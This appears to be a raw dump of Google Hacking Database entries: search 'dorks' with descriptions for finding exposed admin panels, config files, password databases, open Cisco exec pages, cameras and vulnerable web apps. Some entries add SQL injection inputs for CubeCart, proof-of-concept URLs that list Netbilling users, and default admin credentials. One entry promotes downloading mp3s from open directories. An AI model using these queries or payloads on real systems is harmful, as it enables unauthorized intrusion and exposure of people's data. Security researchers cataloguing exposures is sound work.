[[descr]WebExplorer Server is a web-based file management system for sharing files with user permissions and quota limits. It features easy user interface and online administration which will allow you to manage users/groups/permissions without the need of server configuration knowledge. It can be used for remote file storage(eg FreeDrive)/hosting services, Companies/Educational institutions that need to share documents among people.[descr]]
[[url]http://www.google.com/search?hl=en&q=%22WebExplorer+Server+-+Login%22+%22Welcome+to+WebExplorer+Server%22&btnG=B%C3%BAsqueda&meta=[url]]
[[dork]"WebExplorer Server - Login" "Welcome to WebExplorer Server"[dork]]
[end][663]]
[[start][664]
[[title]intitle:"ASP Stats Generator *.*" "ASP Stats Generator" "2003-2004 weppos"[title]]
[[descr]ASP Stats Generator is a powerful ASP script to track web site activity. It combines a server side sniffer with a javascript system to get information about clients who are visiting your site.[descr]]
[[url]http://www.google.com/search?hl=en&ie=ISO-8859-1&q=intitle%3A%22ASP+Stats+Generator+*.*%22+%22ASP+Stats+Generator%22+%222003-2004+weppos%22&btnG=B%FAsqueda&meta=[url]]
[[dork]intitle:"ASP Stats Generator *.*" "ASP Stats Generator" "2003-2004 weppos"[dork]]
[end][664]]
[[start][665]
[[title]"Installed Objects Scanner" inurl:default.asp[[title]]
[[descr] Installed Objects Scanner makes it easy to test your IIS Webserver for installed components. Installed Objects Scanner also has descriptions and links for many components to let you know more on how using those components.
Just place the script on your server and view it in your browser to check your server for all currently known components.
[descr]]
[[url]http://www.google.com/search?hl=en&lr=&ie=ISO-8859-1&q=%22Installed+Objects+Scanner%22+inurl%3Adefault.asp++&btnG=Search[url]]
[[dork]"Installed Objects Scanner" inurl:default.asp [dork]]
[end][665]]
[[start][666]
[[title] intitle:"remote assessment" OpenAanval Console[[title]]
[[descr]The Aanval Intrusion Detection Console is an advanced intrusion detection monitor and alerting system. Currently supporting modules for Snort and syslog - Aanval provides real-time monitoring, reporting, alerting and stability. Aanval's web-browser interface provides real-time event viewing and system/sensor management.
[descr]]
[[url]http://www.google.com/search?q=%0Aintitle%3A%22remote+assessment%22+OpenAanval+Console[url]]
[[dork]
intitle:"remote assessment" OpenAanval Console[dork]]
[end][666]]
[[start][667]
[[title]ext:ini intext:env.ini[[title]]
[[descr]This one shows configuration files for various applications. based on the application an attacker may find information like passwords, ipaddresses and more.[descr]]
[[url]http://www.google.com/search?hl=en&lr=&q=ext%3Aini+intext%3Aenv.ini&btnG=Search[url]]
[[dork]ext:ini intext:env.ini[dork]]
[end][667]]
[[start][668]
[[title]ezBOO "Administrator Panel" -cvs[[title]]
[[descr]ezBOO WebStats is a high level statistical tool for web sites monitoring.
It allows real time access monitoring on several sites.
Based on php and mySQL it is easy to install and customization is made easy.
It works on Unix, Linux and Windows[descr]]
[[url]http://www.google.com/search?q=ezBOO+%22%3E%3E+Administrator+Panel+%3C%3C%22+-cvs&hl=en&lr=&start=10&sa=N[url]]
[[dork]ezBOO ">> Administrator Panel <<" -cvs[dork]]
[end][668]]
[[start][669]
[[title]"This page has been automatically generated by Plesk Server Administrator"[title]]
[[descr]Plesk Server Administrator (PSA) is web based software that enables remote administration of web servers. It can be used on Linux and other systems that support PHP.
Due to an input validation error in Plesk Server Administrator, it is possible for a remote attacker to make a specially crafted web request which will display PHP source code.
This is acheivable by connecting to a host (using the IP address rather than the domain name), and submitting a request for a known PHP file along with a valid username.
http://www.securityfocus.com/bid/3737
[descr]]
[[url]http://www.google.com/search?hl=en&q=%22This+page+has+been+automatically+generated+by+Plesk+Server+Administrator%22&btnG=B%C3%BAsqueda&meta=[url]]
[[dork]"This page has been automatically generated by Plesk Server Administrator"[dork]]
[end][669]]
[[start][670]
[[title]"The script whose uid is " "is not allowed to access"[title]]
[[descr]This PHP error message is revealing the webserver's directory and user ID.
[descr]]
[[url]http://www.google.com/search?q=%22The+script+whose+uid+is+%22+%22is+not+allowed+to+access%22&btnG=Search&hl=en&lr=&client=firefox-a[url]]
[[dork]"The script whose uid is " "is not allowed to access"[dork]]
[end][670]]
[[start][671]
[[title]filetype:php inurl:nqt intext:"Network Query Tool"[title]]
[[descr]Network Query Tool enables any Internet user to scan network information using:
* Resolve/Reverse Lookup
* Get DNS Records
* Whois (Web)
* Whois (IP owner)
* Check port (!!!)
* Ping host
* Traceroute to host
* Do it all
The author has been informed that the nqt form also accepts input from cross site pages, but he will not fix it.
A smart programmer could use the port scan feature and probe al the nmap services ports. Though this would be slow, but it provides a higher degree of anonymity, especially if the attacker is using a proxy or an Internet Cafe host to access the NQT pages.
It gets even worse .. an attacker can scan the *internal* hosts of the networks that host NQT in many cases. Very dangerous.
PS: this vulnerability was found early this year (search google for the full report), but was never added to the GHDB for some reason.[descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&q=filetype%3Aphp+inurl%3Anqt+intext%3A%22Network+Query+Tool%22+&btnG=Search[url]]
[[dork]filetype:php inurl:nqt intext:"Network Query Tool" [dork]]
[end][671]]
[[start][672]
[[title]inurl:TiVoConnect?Command=QueryServer[[title]]
[[descr]Tivo is a the digital replacement for your analog videorecorder. It's a digital media system that amongst other things allows recording tv shows to a hard disk. More information is available at http://www.tivo.com.
This search was found in one of those cgi scanning tools out there. Currently there are only two results and only the first responds with information like this:
1.0
Sat Oct 16 15:26:46 EDT 2004
JavaHMO
1.0
Leon Nicholls
-
This is an official build. Identifier: 2003.03.25-1612 Last Change: 112792
In the future vulnerabilities may be found in this software. For now an attacker can enjoy the mp3 stream it provides (copy the server:port in winamp or xmms).[descr]]
[[url]http://www.google.com/search?q=inurl%3ATiVoConnect%3FCommand%3DQueryServer[url]]
[[dork]inurl:TiVoConnect?Command=QueryServer[dork]]
[end][672]]
[[start][673]
[[title]ext:mdb inurl:*.mdb inurl:fpdb shop.mdb[[title]]
[[descr]The directory "http:/xxx/fpdb/" is the database folder used by some versions of FrontPage. It contains many types of Microsoft Access databases.
One of them is Metacart, who used "shop.mdb" as their default name. It contains customer info like phone numbers but also plain text passwords. A screenshot is available at ImageShack: http://img49.exs.cx/img49/7673/shopmdb.jpg
Three results only at time of writing. Remove the shop.mdb part to see the complete list of databases.[descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&q=ext%3Amdb+inurl%3A*.mdb++inurl%3Afpdb+shop[url]]
[[dork]ext:mdb inurl:*.mdb inurl:fpdb shop[dork]]
[end][673]]
[[start][674]
[[title]inurl:cgi-bin/testcgi.exe "Please distribute TestCGI"[title]]
[[descr]Test CGI by Lilikoi Software aids in the installation of the Ceilidh discussion engine for the World Wide Web. An attacker can use this to gather information about the server like: Operating System, IP and the full docroot path.[descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&q=inurl%3Acgi-bin%2Ftestcgi.exe+%22Please+distribute+TestCGI%22[url]]
[[dork]inurl:cgi-bin/testcgi.exe "Please distribute TestCGI"[dork]]
[end][674]]
[[start][675]
[[title]inurl:ttt-webmaster.php[[title]]
[[descr]Turbo traffic trader Nitro v1.0 is a free, fully automated traffic trading script. Multiple vulnerabilities were found.
Vulnerability report: http://www.securityfocus.com/bid/11358
Vendor site: http://www.turbotraffictrader.com/php
[descr]]
[[url]http://www.google.com/search?q=inurl:ttt-webmaster.php&num=100&hl=en&lr=&c2coff=1&safe=off&filter=0[url]]
[[dork]inurl:ttt-webmaster.php[dork]]
[end][675]]
[[start][676]
[[title]intitle:"DVR Web client"[title]]
[[descr]This embedded DVR is quick plug and play. Just plug it in and it will start recording. You can view all the cameras at once or one at a time. Allows individual pictures to come up on play back or all together. The best feature is the ability to connect via a network and play back existing stored video or view images live.
* Four Channel Input
* Horizontal Resolution 480 Lines
* 16.7 Million Color Output
* Display In Quad or Single Image (Full MultiPlex)
* Motion Detection
* Scheduling
* Zoom in Live and Playback
* 720H X 480V (Full) 360H X 240V In Quad
* 0.1 FPS Thru 15 FPS each camera (60 FPS Total)
* Web Interface TCP/IP With Client Software
* Back-Up With Mark Image, VCR, Time Lapse, Remote Client Software
* Full Remote Camera Controls (PTZ), Alarms, Wiper, Fans, Etc. [descr]]
[[url]http://www.google.com/search?q=intitle:%22DVR+Web+client%22&hl=en&lr=&ie=UTF-8&client=firefox-a&filter=0[url]]
[[dork]intitle:"DVR Web client"[dork]]
[end][676]]
[[start][677]
[[title]intitle:"ASP FileMan" Resend -site:iisworks.com[[title]]
[[descr]FileMan is a corporate web based storage and file management solution for intra- and internet. It runs on Microsoft IIS webservers and is written in ASP. All user and group settings are stored in a MS Access or SQL database.
Default user: user=admin, pass=pass
In the default installation a diagnostigs page calleddiags.asp exists the manual recommends to delete it, but it can be found in some installs. The path to the database is also on the page. If the server is not configured correctly, the mdb file can be downloaded and the passwords are not encrypted.
Site admins have been notified. As always: DO NOT ABUSE THIS.[descr]]
[[url]http://www.google.com/search?q=intitle:%22ASP+FileMan%22+Resend+-site:iisworks.com&num=100&hl=en&lr=&c2coff=1&safe=off&client=firefox-a&filter=0[url]]
[[dork]intitle:"ASP FileMan" Resend -site:iisworks.com[dork]]
[end][677]]
[[start][678]
[[title]intitle:"index.of *" admin news.asp configview.asp[[title]]
[[descr]With Compulive News you can enter the details of your news items onto a webform and upload images through your browser. It integrates seamlessly within your website.
When you open your CNU5 zip there is a news folder created with three subfolders: htmlarea, images and admin. In the news folder is your database file ‘news.mdb’.
For security purposes the manual recommends that you immediately rename this database to a name of your own choosing thereby making it harder for anyone to download your news database.
The database contains the plain text password.
PS: this search is based on the index.of method. There are other ways to find this software, but finding the news database becomes a lot more difficult for an attacker that way.[descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&q=intitle%3A%22index.of+*%22+admin+news.asp+configview.asp&btnG=Search[url]]
[[dork]intitle:"index.of *" admin news.asp configview.asp[dork]]
[end][678]]
[[start][679]
[[title]"Copyright © 2002 Agustin Dondo Scripts"[title]]
[[descr]CoolPHP has multiple vulnerabilities:
* Cross-Site Scripting vulnerability (index.php)
* A Path Disclosure Vulnerability (index.php)
* Local file include Vulnerability with Directory Traversal
info: http://www.securityfocus.com/archive/1/378617
[descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=%22Copyright+%C2%A9+2002+Agustin+Dondo+Scripts%22&btnG=Search[url]]
[[dork]"Copyright © 2002 Agustin Dondo Scripts"[dork]]
[end][679]]
[[start][680]
[[title]"IMail Server Web Messaging" intitle:login[[title]]
[[descr]IMail Server from Ipswitch is a messaging solution with 60 million users worldwide. It contains the features and safeguards you need without the complexity of expensive solutions like Microsoft Exchange® or groupware which challenges even the most experienced administrators.
This is a login portal search. Security Focus shows a list of vulnerabilities about this software.[descr]]
[[url]http://www.google.com/search?q=%22IMail+Server+Web+Messaging%22+intitle:login&hl=en&lr=&filter=0[url]]
[[dork]"IMail Server Web Messaging" intitle:login[dork]]
[end][680]]
[[start][681]
[[title]intitle:"Directory Listing For" intext:Tomcat -intitle:Tomcat[[title]]
[[descr]The Google Hackers Guide explains how to find Apache directory indexes, which are the most common found on the Internet. There are other ways however.
This query is a generic search for servers using Tomcat with directory listings enabled. They are a bit more fancy than Apache's default lists and more importantly they will not be found using "index.of".[descr]]
[[url]http://www.google.com/search?hl=en&q=intitle%3A%22Directory+Listing+For%22+intext%3ATomcat+-intitle%3ATomcat[url]]
[[dork]intitle:"Directory Listing For" intext:Tomcat -intitle:Tomcat[dork]]
[end][681]]
[[start][682]
[[title]site:.viewnetcam.com -www.viewnetcam.com[[title]]
[[descr]The FREE viewnetcam.com service allows you to create a personal web address (e.g., http://bob.viewnetcam.com) at which your camera's live image can be found on the Internet.
How the camera and service works: Special Software embedded within your Panasonic Network Camera gives your camera the ability to locate your unique Internet address. No matter what kind of Internet connection you have or which Internet provider you use, the viewnetcam.com service will keep your camera's Internet address permanent.[descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&q=site%3A.viewnetcam.com+-www.viewnetcam.com[url]]
[[dork]site:.viewnetcam.com -www.viewnetcam.com[dork]]
[end][682]]
[[start][683]
[[title]inurl:/cgi-bin/finger? Enter (account|host|user|username)[[title]]
[[descr]The finger command on unix displays information about the system users. This search displays the webinterface for that command.[descr]]
[[url]http://www.google.com/search?hl=en&q=inurl%3A%2Fcgi-bin%2Ffinger%3F+Enter+%28account%7Chost%7Cuser%7Cusername%29+&btnG=Google+Search[url]]
[[dork]inurl:/cgi-bin/finger? Enter (account|host|user|username) [dork]]
[end][683]]
[[start][684]
[[title]inurl:/cgi-bin/finger? "In real life"[title]]
[[descr]The finger command on unix displays information about the system users. This search displays pre-fingered users, so an attacker wouldn't even have to guess their accounts.[descr]]
[[url]http://www.google.com/search?q=inurl:/cgi-bin/finger%3F+%22In+real+life%22&num=100&hl=en&lr=&ie=UTF-8&filter=0[url]]
[[dork]inurl:/cgi-bin/finger? "In real life"[dork]]
[end][684]]
[[start][686]
[[title]inurl:"calendar.asp?action=login"[title]]
[[descr]aspWebCalendar is a browser based software package that runs over a standard web browser, such as Internet Explorer from Microsoft, and allows an organization of any size to easily and cost effectively provide personal and group calendar functions to everyone in the organization.
A vulnerability has been found for the (SQL version) script family from Full Revolution. Affected software is: aspWebAlbum, aspWebCalendar, aspWebHeadlines, aspWebMail.
You can check it here: http://www.securityfocus.com/bid/11246
Searches for aspWebAlbum and aspWebHeadlines:
inurl:"album.asp?action=login"
inurl:"news.asp?action=login" [descr]]
[[url]http://www.google.com/search?hl=en&lr=&q=inurl%3A%22calendar.asp%3Faction%3Dlogin%22+&btnG=Search[url]]
[[dork]inurl:"calendar.asp?action=login" [dork]]
[end][686]]
[[start][690]
[[title]"Powered by CubeCart"[title]]
[[descr]--------------------------------------------------------
Full path disclosure and sql injection on CubeCart 2.0.1
--------------------------------------------------------
[1]Introduction
[2]The Problem
[3]The Solution
[4]Timeline
[5]Feddback
##############################################################
[1]Introduction
"CubeCart is an eCommerce script written with PHP & MySQL. With CubeCart you can setup a powerful online store as long as you
have hosting supporting PHP and one MySQL database."
This info was taken from hxxp://www.cubecart.com
CubeCart, from Brooky (hxxp://www.brooky.com), is a software formerly known as eStore.
[2]The Problem
A remote user can cause an error in index.php using the parameter 'cat_id' which is not properly validated, displaying the
software's full installation path. It can also be used to inject sql commands. Examples follow:
(a) http://example.com/store/index.php?cat_id='
causes an error like this:
"Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
/home/example/public_html/store/link_navi.php on line 35
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in
/home/example/public_html/store/index.php on line 170
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
/home/example/public_html/store/index.php on line 172"
(b) http://example.com/store/index.php?cat_id=1 or 1=1--
displays all categories in the database
[3]The Solution
None at this time.Vendor contacted and fix will be avaliable soon.
[4]Timeline
(2/10/2004) Vulnerability discovered
(2/10/2004) Vendor notified
(3/10/2004) Vendor response
[5]Feedback
Comments and stuff to cybercide@megamail.pt
[descr]]
[[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=%22Powered+by+CubeCart%22&btnG=Search[url]]
[[dork]"Powered by CubeCart"[dork]]
[end][690]]
[[start][694]
[[title]inurl:confixx inurl:login|anmeldung[[title]]
[[descr]Confixx is a webhosting management tool and has the following features:
* create resellers,
* edit personal data,
* manage newsletters to resellers,
* comprehensive stats,
* powerful evaluation of traffic,
* manage e-mail templates,
* lock resellers.
security focus has a vulnerability report on this.
vendor: http://www.sw-soft.com/en/products/confixx/[descr]]
[[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&newwindow=1&q=inurl%3Aconfixx+inurl%3Alogin%7Canmeldung&btnG=Search[url]]
[[dork]inurl:confixx inurl:login|anmeldung[dork]]
[end][694]]
[[start][695]
[[title]"VHCS Pro ver" -demo[[title]]
[[descr]VHCS is professional Control Panel Software for Shared, Reseller, vServer and Dedicated Servers.
No vulnerabilities are reported to security focus.[descr]]
[[url]http://www.google.com/search?q=%22VHCS+Pro+++ver%22+-demo&num=100&hl=en&lr=&newwindow=1&c2coff=1&safe=off&filter=0[url]]
[[dork]"VHCS Pro ver" -demo[dork]]
[end][695]]
[[start][696]
[[title]intitle:"Virtual Server Administration System"[title]]
[[descr]VISAS, German control panel software like confixx.
No vulnerabilities are reported to security focus.[descr]]
[[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&newwindow=1&q=intitle%3A%22Virtual+Server+Administration+System%22[url]]
[[dork]intitle:"Virtual Server Administration System"[dork]]
[end][696]]
[[start][697]
[[title]"SysCP - login"[title]]
[[descr]SysCP: Open Source server management tool for Debian Linux
No vulnerabilities are reported to security focus.[descr]]
[[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&newwindow=1&q=%22SysCP+-+login%22[url]]
[[dork]"SysCP - login"[dork]]
[end][697]]
[[start][698]
[[title]intitle:"ISPMan : Unauthorized Access prohibited"[title]]
[[descr]ISPMan is a distributed system to manage components of ISP from a central management interface.
No vulnerabilities are reported to security focus.
[descr]]
[[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&newwindow=1&q=intitle%3A%22ISPMan+%3A+Unauthorized+Access+prohibited%22&btnG=Search[url]]
[[dork]intitle:"ISPMan : Unauthorized Access prohibited"[dork]]
[end][698]]
[[start][699]
[[title]"Login - Sun Cobalt RaQ"[title]]
[[descr]The famous Sun linux appliance. Nice clean portal search.
Various vulnerabilities are reported to security focus.[descr]]
[[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&newwindow=1&q=%22Login+-+Sun+Cobalt+RaQ%22[url]]
[[dork]"Login - Sun Cobalt RaQ"[dork]]
[end][699]]
[[start][700]
[[title]"OPENSRS Domain Management" inurl:manage.cgi[[title]]
[[descr]OpenSRS Domain Management System
No vulnerabilities are reported to security focus.
[descr]]
[[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&newwindow=1&q=%22OPENSRS+Domain+Management%22+inurl%3Amanage.cgi[url]]
[[dork]"OPENSRS Domain Management" inurl:manage.cgi[dork]]
[end][700]]
[[start][701]
[[title]intitle:plesk inurl:login.php3[[title]]
[[descr]Plesk is server management software developed for the Hosting Service Industry. Various vulnerabilities are reported to security focus.[descr]]
[[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&newwindow=1&q=intitle%3Aplesk+inurl%3Alogin.php3[url]]
[[dork]intitle:plesk inurl:login.php3[dork]]
[end][701]]
[[start][702]
[[title]inurl:"level/15/exec/-/show"[title]]
[[descr]This search finds Cisco devices which have level 15 access open via webinterface. If an attacker wants to search for another level he can replace the "15" with this level. Levels below 10 need a leading zero (e.g. 04).
Currently only the cached pages can be viewed. [descr]]
[[url]http://www.google.com/search?q=inurl:%22level/15/exec/-/show%22&num=100&hl=en&lr=&c2coff=1&safe=off&filter=0[url]]
[[dork]inurl:"level/15/exec/-/show"[dork]]
[end][702]]
[[start][703]
[[title]inurl:/dana-na/auth/welcome.html[[title]]
[[descr]Neoteris Instant Virtual Extranet (IVE) has been reported prone to a cross-site scripting vulnerability.
The issue presents itself, due to a lack of sufficient sanitization performed on an argument passed to an IVE CGI script. An attacker may exploit this vulnerability to hijack valid Neoteris IVE sessions.
advisories:
http://secunia.com/product/1558/
http://www.securityfocus.com/bid/7510
[descr]]
[[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=inurl%3A%2Fdana-na%2Fauth%2Fwelcome.html&btnG=Search&X=1&filter=0[url]]
[[dork]inurl:/dana-na/auth/welcome.html[dork]]
[end][703]]
[[start][704]
[[title]ext:nsf nsf -gov -mil[[title]]
[[descr]Domino is server technology which transforms Lotus Notes® into an Internet applications server. Domino brings together the open networking environment of Internet standards and protocols with the powerful application development facilities of Notes, providing you with the ability to rapidly develop a broad range of business applications for the Internet and Intranet.
This is a generic search for Lotus Domino files. It identifies Domino users. Search the GBDB for more variations on this theme.[descr]]
[[url]http://www.google.com/search?hl=en&q=ext%3Ansf+nsf+-gov+-mil[url]]
[[dork]ext:nsf nsf -gov -mil[dork]]
[end][704]]
[[start][705]
[[title]inurl:statrep.nsf -gov[[title]]
[[descr]Domino is server technology which transforms Lotus Notes® into an Internet applications server. Domino brings together the open networking environment of Internet standards and protocols with the powerful application development facilities of Notes, providing you with the ability to rapidly develop a broad range of business applications for the Internet and Intranet.
This search finds statistics pages generated by Domino. Information on these pages includes Operating System, Disk space, Usernames and full path disclosure.
Example:
* 1. Statistics Reports - 1. System
* 1. Statistics Reports - 2. Mail & Database
* 1. Statistics Reports - 3. Communications
* 1. Statistics Reports - 4. Network
* 1. Statistics Reports - 5. Clusters
* 1. Statistics Reports - 6. Web Server & Retriever
* 1. Statistics Reports - 7. Calendaring Scheduling
* 2. Alarms
* 3. Events
* 4. Spreadsheet Export
* 5. Graphs - 1. System Statistics
* 5. Graphs - 2. System Loads
* 5. Graphs - 3. System Resources
* 6. Trouble Tickets - 1. Alarm
* 6. Trouble Tickets - 2. Event
* 7. Analysis Report
* 8. File Statistics
* 9. Single Copy Object Store Statistics
[descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=inurl%3Astatrep.nsf+-gov[url]]
[[dork]inurl:statrep.nsf -gov[dork]]
[end][705]]
[[start][706]
[[title]inurl:log.nsf -gov[[title]]
[[descr]Domino is server technology which transforms Lotus Notes® into an Internet applications server. Domino brings together the open networking environment of Internet standards and protocols with the powerful application development facilities of Notes, providing you with the ability to rapidly develop a broad range of business applications for the Internet and Intranet.
This search finds Domino log files. These can be revealing, including information about dbconnect.nsf files, path information, etc.
Example:
* Database-Sizes
* Database-Usage
* Mail Routing Events
* Miscellaneous Events
* NNTP Events
* Object Store Usage
* Passthru Connections
* Phone Calls-By Date
* Phone Calls-By User
* Replication Events
* Sample Billing
* Usage-By Date
* Usage-By User
Example:
2004/04/14 07:51:00 AM ATTEMPT TO ACCESS DATABASE mtstore.ntf by itisdom/ITIS/ITRI was denied[descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=inurl%3Alog.nsf+-gov[url]]
[[dork]inurl:log.nsf -gov[dork]]
[end][706]]
[[start][707]
[[title]inurl:login.php "SquirrelMail version"[title]]
[[descr]SquirrelMail is a standards-based webmail package written in PHP4. It includes built-in pure PHP support for the IMAP and SMTP protocols, and all pages render in pure HTML 4.0 (with no JavaScript required) for maximum compatibility across browsers. It has very few requirements and is very easy to configure and install. SquirrelMail has all the functionality you would want from an email client, including strong MIME support, address books, and folder manipulation. [descr]]
[[url]http://www.google.com/search?hl=en&lr=&client=firefox-a&q=inurl%3Alogin.php+%22SquirrelMail+version%22&btnG=Search[url]]
[[dork]inurl:login.php "SquirrelMail version"[dork]]
[end][707]]
[[start][708]
[[title]"Ideal BB Version: 0.1" -idealbb.com[[title]]
[[descr]Ideal BB has been a popular choice for powering web based bulletin boards and we are now proud to introduce our next generation bulletin board Ideal BB.NET. Ideal Science IdealBB is reported prone to multiple unspecified input validation vulnerabilities. These issues result from insufficient sanitization of user-supplied data.
Securityfocus currently has 3 reports idealBB.[descr]]
[[url]http://www.google.com/search?hl=en&ie=ISO-8859-1&q=%22Ideal+BB+Version%3A+0.1%22+-idealbb.com&btnG=Google-Suche&meta=[url]]
[[dork]"Ideal BB Version: 0.1" -idealbb.com[dork]]
[end][708]]
[[start][709]
[[title](inurl:81/cgi-bin/.cobalt/) | (intext:"Welcome to the Cobalt RaQ")[[title]]
[[descr]The famous Sun linux appliance. The default page displays this text:
"Congratulations on Choosing a Cobalt RaQ - the premier server appliance platform for web hosting. This page can easily be replaced with your own page. To replace this page, transfer your new content to the directory /home/sites/home/web".[descr]]
[[url]http://www.google.com/search?hl=en&lr=&client=firefox-a&q=%28inurl%3A81%2Fcgi-bin%2F.cobalt%2F%29++%7C+%28intext%3A%22Welcome+to+the+Cobalt+RaQ%22+%29&btnG=Search[url]]
[[dork](inurl:81/cgi-bin/.cobalt/) | (intext:"Welcome to the Cobalt RaQ" )[dork]]
[end][709]]
[[start][710]
[[title]"Powered by YaPig V0.92b"[title]]
[[descr]YaPiG is reported to contain an HTML injection vulnerability.
The problem is reported to present itself due to a lack of sanitization performed on certain field data.
This may allow an attacker to inject malicious HTML and script code into the application.
http://www.securityfocus.com/bid/11452
[descr]]
[[url]http://www.google.com/search?hl=en&q=%22Powered+by+YaPig+V0.92b%22&btnG=Google+Search[url]]
[[dork]"Powered by YaPig V0.92b"[dork]]
[end][710]]
[[start][712]
[[title]intitle:"toshiba network camera - User Login"[title]]
[[descr]Web interface of Toshiba network cameras.[descr]]
[[url]http://www.google.com/search?hl=en&ie=ISO-8859-1&q=intitle%3A%22toshiba+network+camera+-+User+Login%22&btnG=Suche&meta=[url]]
[[dork]intitle:"toshiba network camera - User Login"[dork]]
[end][712]]
[[start][713]
[[title]inurl:"/site/articles.asp?idcategory="[title]]
[[descr]Dwc_Articles is an ASP application designed to add Featured,
Recent and Popular News through an easy to use administration area.
Other features: Design Packages, Add, Modify, Deactive through HTML/Wysiwyg Editor,
Nearly all scripts suffer from possible sql injections.
http://www.securityfocus.com/bid/11509[descr]]
[[url]http://www.google.com/search?hl=en&ie=ISO-8859-1&q=inurl%3A%22%2Fsite%2Farticles.asp%3Fidcategory%3D%22+&btnG=Google-Suche&meta=[url]]
[[dork]inurl:"/site/articles.asp?idcategory=" [dork]]
[end][713]]
[[start][714]
[[title]index.of.dcim[[title]]
[[descr]The DCIM directory is the default name for a few brands of digital camers. This is not a big network security risk, but like netcams it can reveal juicy details if found on corporate intranets.[descr]]
[[url]http://www.google.com/search?q=index.of.dcim&sourceid=mozilla-search&start=0&start=0&ie=utf-8&oe=utf-8[url]]
[[dork]index.of.dcim[dork]]
[end][714]]
[[start][715]
[[title]intitle:"Router Setup Home" Home Help Login Internet Status[[title]]
[[descr]Belkin DSL/Cable Routers. These routers are shipped with a blank remote access password. An attacker will need to log in before you can change any settings, unless it's left blank.[descr]]
[[url]http://www.google.com/search?q=intitle:%22Router+Setup+Home%22+Home+Help+Login+Internet+Status&num=100&hl=en&lr=&c2coff=1&safe=off&filter=0[url]]
[[dork]intitle:"Router Setup Home" Home Help Login Internet Status[dork]]
[end][715]]
[[start][717]
[[title]"Portal engine source code * copyright © 2002-2004 * DotNetNuke." -site:dotnetnuke.com[[title]]
[[descr]Just a search for DotNetNuke. A friend was thinking of installing it so I started to search for them.
Search SF for vulnerability report.[descr]]
[[url]http://www.google.com/search?q=%22Portal+engine+source+code+*+copyright+%C2%A9+2002-2004+*+DotNetNuke.%22+-site%3Adotnetnuke.com[url]]
[[dork]"Portal engine source code * copyright © 2002-2004 * DotNetNuke." -site:dotnetnuke.com[dork]]
[end][717]]
[[start][718]
[[title]linksys camera inurl:main.cgi[[title]]
[[descr]Linksys web cameras. There's a cross-site scripting vuln in the way Linksys uses the next_file arguement with main.cgi as well. I just saw these pop up on the shelves at Best Buy.[descr]]
[[url]http://www.google.com/search?hl=en&lr=&client=firefox-a&q=linksys+camera++inurl%3Amain.cgi&btnG=Search[url]]
[[dork]linksys camera inurl:main.cgi[dork]]
[end][718]]
[[start][719]
[[title]intitle:"phpremoteview" filetype:php "Name, Size, Type, Modify"[title]]
[[descr]phpRemoteView is webbased filemanger with a basic shell. With this an attacker can browse the server filesystem use the online php interpreter.
vendor: http://php.spb.ru/remview/ (russian)[descr]]
[[url]http://www.google.com/search?q=intitle%3A%22phpremoteview%22+filetype%3Aphp+%22Name%2C+Size%2C+Type%2C+Modify%22[url]]
[[dork]intitle:"phpremoteview" filetype:php "Name, Size, Type, Modify"[dork]]
[end][719]]
[[start][720]
[[title]intitle:"index of" -inurl:htm -inurl:html mp3[[title]]
[[descr]Yes! I probably have should have told you guys earlier, but this is how ive been getting 100% of my mp3s. It fricken rocks, use it and abuse it. Downfalls to it... a)sometimes you shouldnt include mp3 in the query and getting what you want takes several different methods of searching b)a lot of the time google gives you results and they are not there thanks to good old friend 404 c)finding stuff takes a lot of practice. Goods... a)ive found whole albums b)ive mass downloaded directories of hundreds of songs that i have intrest in c)its exciting seeing the results, like fining treasure.[descr]]
[[url]http://www.google.com/search?q=intitle%3A%22index+of%22+-inurl%3Ahtm+-inurl%3Ahtml+mp3[url]]
[[dork]intitle:"index of" -inurl:htm -inurl:html mp3[dork]]
[end][720]]
[[start][721]
[[title]intitle:"Index of" upload size parent directory[[title]]
[[descr]Files uploaded through ftp by other people, sometimes you can find all sorts of things from movies to important stuff. [descr]]
[[url]http://www.google.com/search?num=100&q=intitle%3A%22Index+of%22+upload+size+parent+directory[url]]
[[dork]intitle:"Index of" upload size parent directory[dork]]
[end][721]]
[[start][722]
[[title][[title]]
[[descr][descr]]
[[url]http://www.google.com/[url]]
[[dork][dork]]
[end][722]]
[[start][723]
[[title][[title]]
[[descr][descr]]
[[url]http://www.google.com/[url]]
[[dork][dork]]
[end][723]]
[[start][724]
[[title]filetype:cgi inurl:nbmember.cgi[[title]]
[[descr]vulnerable Netbilling nbmember.cgi
Netbilling 'nbmember.cgi' script is reported prone to an information disclosure vulnerability. This issue may allow remote attackers to gain access to user authentication credentials and potentially sensitive configuration information.
The following proof of concept is available:
http://www.example.com/cgi-bin/nbmember.cgi?cmd=test
http://www.example.com/cgi-bin/nbmember.cgi?cmd=list_all_users&keyword=hereistheaccesskeyword
http://www.securityfocus.com/bid/11504[descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=filetype%3Acgi+inurl%3Anbmember.cgi&btnG=Search[url]]
[[dork]filetype:cgi inurl:nbmember.cgi[dork]]
[end][724]]
[[start][725]
[[title]"Powered by Coppermine Photo Gallery"[title]]
[[descr]published Oct 20, 2004, updated Oct 20, 2004
vulnerable:
Coppermine Photo Gallery Coppermine Photo Gallery 1.0
Coppermine Photo Gallery Coppermine Photo Gallery 1.1
Coppermine Photo Gallery Coppermine Photo Gallery 1.2
Coppermine Photo Gallery Coppermine Photo Gallery 1.2.1
